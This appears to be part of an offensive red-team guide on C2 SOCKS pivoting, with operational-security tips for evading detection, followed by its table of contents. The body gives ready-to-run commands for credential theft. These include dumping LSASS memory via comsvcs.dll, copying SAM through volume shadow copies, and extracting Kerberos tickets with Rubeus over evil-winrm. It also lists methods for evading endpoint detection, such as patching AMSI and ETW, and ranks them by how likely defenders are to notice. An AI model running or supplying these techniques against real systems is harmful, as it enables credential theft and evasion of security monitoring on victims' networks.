# Alternative execution methods
powershell -Command "& {Get-Process}"
powershell -WindowStyle Hidden -Command "Get-Process"
cmd /c echo Get-Process | powershell -

Detection Mechanism Categories

User-Mode vs Kernel-Mode Detection

User-Mode Detection (Easier to Bypass):

AMSI (Antimalware Scan Interface) — Scans PowerShell, .NET, scripting engines
ETW (Event Tracing for Windows) — Logs PowerShell execution, .NET loading
API Hooking — Userland hooks in ntdll.dll, kernel32.dll
Process Hollowing Detection — Checks PE header integrity
DLL Injection Detection — Monitors SetWindowsHookEx, LoadLibrary

Kernel-Mode Detection (Harder to Bypass):

PatchGuard — Windows kernel integrity protection
HVCI (Hypervisor-protected Code Integrity) — Validates kernel code signing
Kernel Callbacks — PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks
SSDT Hooking — System Service Descriptor Table monitoring
Hardware Features — Intel CET, Intel MPX, ARM Pointer Authentication

Detection Evasion Strategy

Detection Type	Bypass Strategy	OPSEC Rating
AMSI	Patch AmsiScanBuffer, disable providers	🟢 EFFECTIVE
ETW	Patch EtwEventWrite, disable providers	🟢 EFFECTIVE
API Hooks	Direct syscalls, unhook APIs	🟡 MODERATE
Behavioral Analysis	Sleep obfuscation, API call delays	🟡 MODERATE
Kernel Callbacks	Process hollowing, DLL hijacking	🟠 DIFFICULT
Hardware Detection	VM detection, hypervisor evasion	🔴 VERY DIFFICULT

Credential Access OPSEC Through C2

High-Risk Credential Operations

When performing credential access through C2 SOCKS, these operations have elevated detection risks:

Technique	Risk Level	Detection Method	OPSEC Alternative
Mimikatz	🔴 EXTREME	EDR signature, process injection	Use built-in Windows tools
procdump lsass	🔴 HIGH	Sysmon Event ID 10, handle access	Use comsvcs.dll method
reg save SAM	🟠 MEDIUM	Registry access logging	Use volume shadow copy
DCSync	🔴 EXTREME	Event ID 4662, unusual LDAP queries	Use legitimate admin account
Golden Ticket	🟡 MEDIUM	Abnormal Kerberos usage patterns	Silver tickets (more targeted)

OPSEC-Conscious Credential Extraction

Silent LSASS Dump (comsvcs.dll method):

# Execute through C2 (WinRM/evil-winrm)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full

# Alternative: Use Task Manager method
tasklist /fi "imagename eq lsass.exe"
# Note PID, then use GUI to create dump (less detectable)

Registry-Based Credential Access:

# Query cached credentials (low-noise)
reg query "HKEY_LOCAL_MACHINE\SECURITY\Cache" /s 2>$null

# Export SAM hashes using volume shadow copy
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[N]\Windows\System32\config\SAM C:\temp\sam.backup

Kerberos Ticket Extraction (Quieter than Mimikatz):

# Use built-in klist (no additional tools)
klist sessions
klist tickets

# Export tickets using Rubeus (smaller footprint than Mimikatz)
# Execute via C2: 
# proxychains evil-winrm -i TARGET -u USER -p PASS
# Upload Rubeus.exe, then:
.\Rubeus.exe dump /nowrap

Key Takeaways

C2 SOCKS ≠ SSH/Chisel SOCKS
- Beacon sleep adds latency (5-60s per connection)
- Detection profile is tied to C2 behavior (callbacks, malleable profiles, beacon timing)
- Host artifacts are minimal (no new process), but memory forensics can detect SOCKS handler
Framework Differences Matter
- Cobalt Strike: Best GUI integration, SOCKS5 auth, but beacon sleep kills latency
- Sliver: Named pipe pivots are stealthier than TCP pivots, reverse SOCKS is unique
- Metasploit: SOCKS4a has better tool compatibility, autoroute is straightforward
Detection is Time-Based
- IDS/SIEM can correlate: C2_callback(T) → internal_connection(T+0-5s)
- Mitigation: Add jitter to beacon sleep, rate-limit scanning, randomize sleep intervals
Double-Pivot is High-Risk
- Both beacons must check in for SOCKS chain to work
- Latency compounds (Beacon A sleep + Beacon B sleep)
- If one beacon dies, entire chain breaks
Lateral Movement Through SOCKS Works, But...
- High-value actions (DCSync, PSExec) are still logged on target
- SOCKS does NOT evade endpoint detection (Event IDs, Sysmon)
- Use WMI/WinRM instead of PSExec (fewer artifacts)

This is Scenario 4 of 4 in the OPSEC pivoting series.

Stay Low: Proxychains/Pivoting OPSEC — Scenario 4: C2 SOCKS Proxy

Table of Contents

C2 SOCKS Overview

Why C2 SOCKS is Different

When to Use C2 SOCKS

Framework-Specific Setup

Cobalt Strike SOCKS

Basic SOCKS Proxy

SOCKS5 with Authentication

Proxychains Configuration

Sleep Time Impact on SOCKS

Sliver SOCKS

Start SOCKS5 Proxy

Named Pipe Pivots (SMB-based)

TCP Pivots

Metasploit SOCKS

Autoroute Setup

Start SOCKS Proxy

Proxychains Configuration

C2 Framework Comparison

Proxychains Configuration

Standard Single-Beacon Proxy

Double-Pivot Through Multiple Beacons

Per-Command Proxy Configuration

Detection Surface Analysis

What Defenders See

Network-Level Detection

Host-Level Detection

SIEM Correlation Rules

OPSEC Hardening

Cobalt Strike Specific

1. Malleable C2 Profile Tuning

2. Limit SOCKS Exposure

3. Rotate Beacon Sleep Dynamically

4. Use Beacon in "Interactive Mode" Only During Active Pivoting

Sliver Specific

1. Randomize Named Pipe Names

2. Use mTLS for C2 (Not HTTP/HTTPS)

3. Avoid TCP Pivots (Use Named Pipes)

Metasploit Specific

1. Use SOCKS4a Instead of SOCKS5

2. Rotate Meterpreter Session

3. Bind SOCKS to Localhost Only

Traffic Behavior Patterns

Beacon Sleep Impact on Scanning

Connection Fingerprinting

Timing Correlation

Double-Pivot Through Multiple Beacons

Scenario

Setup

Step 1: Start SOCKS on Beacon A

Step 2: Start SOCKS on Beacon B (Reachable Through Beacon A)

Option 1: SSH Jump Through Beacon A's Network

Option 2: Use Beacon A's SOCKS to Reach Beacon B's C2 Listener

Step 3: Configure Proxychains for Double-Pivot

Step 4: Test Double-Pivot

OPSEC Considerations for Double-Pivot

Lateral Movement Through C2 SOCKS

CrackMapExec (CME)

Evil-WinRM

xfreerdp (RDP)

Impacket Tools

psexec.py

wmiexec.py

secretsdump.py

SocksOverRDP Technique (Bonus)

Step 1: Enable Dynamic Port Forwarding Through RDP

OPSEC Risk Matrix

Quick Reference

Cobalt Strike SOCKS Setup

Sliver SOCKS Setup

Metasploit SOCKS Setup

Lateral Movement Commands

Debugging Connection Issues

Advanced EDR Evasion Through C2 SOCKS

AMSI and ETW Bypass Techniques

AMSI Bypass Methods

ETW Bypass Methods

Sleep Obfuscation Techniques

Sleep Obfuscation Methods